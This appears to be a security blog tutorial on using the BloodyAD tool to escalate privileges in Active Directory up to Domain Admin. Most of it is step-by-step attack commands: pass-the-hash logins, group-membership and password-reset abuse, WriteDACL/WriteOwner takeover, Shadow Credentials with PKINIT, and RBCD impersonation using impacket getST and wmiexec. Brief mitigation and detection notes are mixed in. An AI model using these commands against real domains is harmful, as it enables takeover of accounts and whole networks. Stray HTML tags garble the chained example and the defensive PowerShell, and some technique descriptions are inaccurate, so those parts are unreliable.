Listen to this Post

Introduction
Active Directory (AD) remains the primary authentication and authorization hub for enterprise Windows networks, making it a prime target for red teams and attackers. BloodyAD is a powerful Python-based exploitation tool that abuses AD permissions—specifically Discretionary Access Control Lists (DACLs)—to perform privilege escalation, persistence, and full domain compromise through techniques like GenericAll, WriteDACL, and Resource-Based Constrained Delegation (RBCD). This article provides a hands-on guide to setting up BloodyAD, authenticating with passwords or Kerberos tickets, and executing common AD attack paths to elevate privileges to Domain Admin.
Learning Objectives
- Objective 1: Understand how BloodyAD interacts with LDAP and SMB protocols to abuse DACL misconfigurations in Active Directory.
- Objective 2: Execute privilege escalation attacks including adding users to privileged groups, resetting passwords, and performing Shadow Credentials attacks.
- Objective 3: Implement post-exploitation techniques like RBCD and WriteOwner abuse to gain persistent Domain Admin access.
You Should Know
1. Setting Up BloodyAD and Authentication Methods
BloodyAD requires Python 3.9+ and several dependencies. It communicates via LDAP(S) and SMB to modify AD objects. Below is a verified setup on Kali Linux, along with Windows-compatible authentication options.
Step‑by‑step guide:
Clone the repository (Kali / Linux) git clone https://github.com/CravateRouge/bloodyAD.git cd bloodyAD pip install -r requirements.txt python3 setup.py install Verify installation bloodyAD --help
Authentication examples:
Password authentication bloodyAD -d lab.local -u jdoe -p 'Password123' --host 192.168.1.10 Pass-the-Hash (NTLM) bloodyAD -d lab.local -u jdoe --hash 'aad3c435b514a4eeaad3b935b51304fe' --host 192.168.1.10 Kerberos authentication (after obtaining a ticket) bloodyAD -d lab.local -u jdoe -k --host dc.lab.local
Windows alternative: Run BloodyAD via WSL2 or a Python virtual environment. For native Windows, use PowerView (PowerShell) but BloodyAD is preferred for Linux-based red team infrastructure.
2. Enumerating AD Objects and DACLs with BloodyAD
Before exploitation, enumerate users, groups, computers, and their ACLs to identify privilege escalation paths. BloodyAD provides dedicated enumeration modules.
Step‑by‑step guide:
List all domain users bloodyAD --host 192.168.1.10 -d lab.local -u 'lowpriv' -p 'Pass123' get object --type user List domain groups bloodyAD --host 192.168.1.10 -d lab.local -u 'lowpriv' -p 'Pass123' get object --type group Get detailed DACL for a specific object (e.g., Domain Admins group) bloodyAD --host 192.168.1.10 -d lab.local -u 'lowpriv' -p 'Pass123' get object 'CN=Domain Admins,CN=Users,DC=lab,DC=local' --raw Find interesting ACEs (Access Control Entries) for current user bloodyAD --host 192.168.1.10 -d lab.local -u 'lowpriv' -p 'Pass123' get user --aces
Pro tip: Combine BloodyAD with BloodHound output. Use `bloodyAD` to verify and exploit paths identified by BloodHound’s SharpHound collector.
- GenericAll / GenericWrite Abuse – Adding Users to Privileged Groups
If a user has `GenericAll` or `GenericWrite` permissions over a group (e.g., Domain Admins) or another user, they can modify group membership or reset passwords. This is a classic privilege escalation vector.
Step‑by‑step guide:
Assuming 'attacker' has GenericAll over 'Domain Admins' group Add current user (lowpriv) to Domain Admins bloodyAD --host 192.168.1.10 -d lab.local -u 'attacker' -p 'AttackerPass' add groupmember 'CN=Domain Admins,CN=Users,DC=lab,DC=local' 'CN=lowpriv,CN=Users,DC=lab,DC=local' Verify membership bloodyAD --host 192.168.1.10 -d lab.local -u 'lowpriv' -p 'Pass123' get object 'CN=Domain Admins,CN=Users,DC=lab,DC=local' If GenericAll over a user (e.g., admin), reset their password bloodyAD --host 192.168.1.10 -d lab.local -u 'attacker' -p 'AttackerPass' set password 'CN=Administrator,CN=Users,DC=lab,DC=local' 'NewPass123!'
Mitigation: Regularly audit privileged groups’ ACLs using tools like `Get-ACL` in PowerShell or BloodHound’s “Outbound Object Control” analysis.
- WriteDACL & WriteOwner Exploitation – Taking Control of Objects
WriteDACL allows a principal to modify an object’s DACL, effectively granting themselves any permission. WriteOwner allows changing the object’s owner, which also provides full control. These are high-impact misconfigurations.
Step‑by‑step guide:
Exploit WriteDACL over Domain Admin group First, grant yourself GenericAll on the target group bloodyAD --host 192.168.1.10 -d lab.local -u 'attacker' -p 'AttackerPass' add genericAll 'CN=Domain Admins,CN=Users,DC=lab,DC=local' 'CN=attacker,CN=Users,DC=lab,DC=local' Then add yourself as member (same as section 3) bloodyAD --host 192.168.1.10 -d lab.local -u 'attacker' -p 'AttackerPass' add groupmember 'CN=Domain Admins,CN=Users,DC=lab,DC=local' 'CN=attacker,CN=Users,DC=lab,DC=local' Exploit WriteOwner over a computer object (for RBCD) bloodyAD --host 192.168.1.10 -d lab.local -u 'attacker' -p 'AttackerPass' set owner 'CN=WEB01,CN=Computers,DC=lab,DC=local' 'CN=attacker,CN=Users,DC=lab,DC=local' Now you have full control – grant RBCD rights bloodyAD --host 192.168.1.10 -d lab.local -u 'attacker' -p 'AttackerPass' add rbcd 'CN=WEB01,CN=Computers,DC=lab,DC=local' 'CN=attacker,CN=Users,DC=lab,DC=local'
Verification on Windows (PowerShell):
Check DACL for an object (run as domain admin) (Get-Acl "AD:\CN=Domain Admins,CN=Users,DC=lab,DC=local").Access | Format-Table IdentityReference, ActiveDirectoryRights
5. Shadow Credentials Attack – Key Credential Roasting
The Shadow Credentials attack (a variation of Kerberos roasting) abuses the ability to add a key credential (public key) to a user or computer object, allowing the attacker to authenticate as that object using PKINIT. BloodyAD automates this.
Step‑by‑step guide:
Generate a self-signed certificate and add it as Shadow Credential to a target user (e.g., admin) bloodyAD --host 192.168.1.10 -d lab.local -u 'attacker' -p 'AttackerPass' add shadowcredential 'CN=Administrator,CN=Users,DC=lab,DC=local' The tool outputs a PFX file and a hash. Use the hash to obtain a TGT via PKINIT python3 /opt/PKINITtools/gettgtpkinit.py -cert-pfx 'administrator.pfx' -pfx-pass 'password' lab.local/administrator administrator.ccache Now use the TGT to impersonate the admin export KRB5CCNAME=administrator.ccache bloodyAD --host dc.lab.local -d lab.local -k get object 'CN=Domain Admins,CN=Users,DC=lab,DC=local'
Detection: Monitor Event ID 4624 (successful logon) with Logon Process = `Kerberos` and Authentication Package = Kerberos, combined with unusual certificate usage (Event ID 4768, 4769). Also watch for modifications to `msDS-KeyCredentialLink` attribute.
6. Resource-Based Constrained Delegation (RBCD) Exploitation
RBCD allows a computer to delegate its service tickets to any principal. If an attacker has write access to a computer object (e.g., via WriteOwner or GenericAll), they can configure RBCD to impersonate any user (including Domain Admin) to that computer.
Step‑by‑step guide:
Assume attacker controls a computer (or has WriteOwner on a high-value computer like DC) Add RBCD rights from attacker-controlled machine 'ATTACKPC$' to target 'DC01$' bloodyAD --host 192.168.1.10 -d lab.local -u 'attacker' -p 'AttackerPass' add rbcd 'CN=DC01,CN=Computers,DC=lab,DC=local' 'CN=ATTACKPC,CN=Computers,DC=lab,DC=local' Now request a TGS for Domain Admin to DC01 using attacker's machine account python3 /opt/impacket/examples/getST.py -spn 'cifs/dc01.lab.local' -impersonate Administrator -dc-ip 192.168.1.10 lab.local/ATTACKPC$ -hashes ':aad3c435b514a4eeaad3b935b51304fe' Use the ticket to access DC01 export KRB5CCNAME=Administrator.ccache python3 /opt/impacket/examples/wmiexec.py -k -no-pass dc01.lab.local
Mitigation: Set `msDS-AllowedToActOnBehalfOfOtherIdentity` to null on high-value computers. Use the `Protected Users` group and enable Credential Guard.
7. Full Domain Compromise – Chaining Techniques
A realistic attack chain: Initial foothold → Enumerate with BloodyAD → Identify WriteDACL on a user → Reset that user’s password → User has GenericAll on Domain Admins → Add yourself → Full control.
Step‑by‑step guide (complete automation example):
1. Authenticate as low-priv user bloodyAD --host 192.168.1.10 -d lab.local -u 'jdoe' -p 'Winter2024' get user --aces > aces.txt <ol> <li>Find that jdoe has ResetPassword on svc_backup</li> <li>Reset svc_backup password bloodyAD --host 192.168.1.10 -d lab.local -u 'jdoe' -p 'Winter2024' set password 'CN=svc_backup,CN=Users,DC=lab,DC=local' 'NewPass123!'</p></li> <li><p>Authenticate as svc_backup bloodyAD --host 192.168.1.10 -d lab.local -u 'svc_backup' -p 'NewPass123!' get object --type group</p></li> <li><p>svc_backup has GenericAll on Domain Admins – add jdoe bloodyAD --host 192.168.1.10 -d lab.local -u 'svc_backup' -p 'NewPass123!' add groupmember 'CN=Domain Admins,CN=Users,DC=lab,DC=local' 'CN=jdoe,CN=Users,DC=lab,DC=local'</p></li> <li><p>jdoe is now Domain Admin bloodyAD --host 192.168.1.10 -d lab.local -u 'jdoe' -p 'Winter2024' get object 'CN=Domain Admins,CN=Users,DC=lab,DC=local' --raw | grep member
Windows defensive commands:
Find all users with ResetPassword privileges over others (PowerShell)
Get-ADObject -LDAPFilter "(objectClass=user)" | ForEach-Object { $acl = Get-Acl "AD:\$($<em>.DistinguishedName)"; $acl.Access | Where-Object { $</em>.ActiveDirectoryRights -like "ResetPassword" } }
What Undercode Say
- Key Takeaway 1: BloodyAD is an indispensable tool for red teams, offering a unified CLI to exploit AD ACL misconfigurations without needing multiple scripts (e.g., PowerView, SharpHound abuse).
- Key Takeaway 2: The most critical misconfigurations are GenericAll/WriteDACL over privileged groups and users – these often stem from legacy delegation settings or improper admin segmentation.
Analysis: Active Directory’s DACL model, while flexible, becomes a liability when over-permissive ACEs accumulate over years of IT operations. Attackers like those using BloodyAD rely on the fact that organizations rarely audit “who can change whom.” Modern defensive strategies must move beyond periodic BloodHound scans to real-time ACL anomaly detection (e.g., using PowerShell Event ID 5136 for LDAP modifications). Additionally, implementing tiered administration (Tier 0,1,2) and removing unnecessary delegation can prevent 90% of BloodyAD’s attack paths. For blue teams, deploying Windows Defender for Identity (formerly Azure ATP) and monitoring for unusual LDAP modifications (like adding shadow credentials) is critical. Red teams should practice chaining low-privilege DACL abuses to demonstrate real-world risk.
Prediction
As organizations migrate to hybrid AD and Entra ID (Azure AD), DACL abuse will expand to cloud-native permissions like Azure RBAC and Microsoft Graph API scopes. BloodyAD will likely evolve into a cross-platform tool targeting both on-prem AD and Entra ID, with attacks like “Shadow Credentials” morphing into federated identity compromise (e.g., adding rogue SAML signing certificates). By 2027, automated red team tools will integrate LLM-driven ACL analysis to suggest exploitation chains in real time, forcing defenders to adopt zero-trust principles for directory services – including just-in-time admin access and continuous ACL validation.
▶️ Related Video (86% Match):
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Nishaasharmaa Active – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅


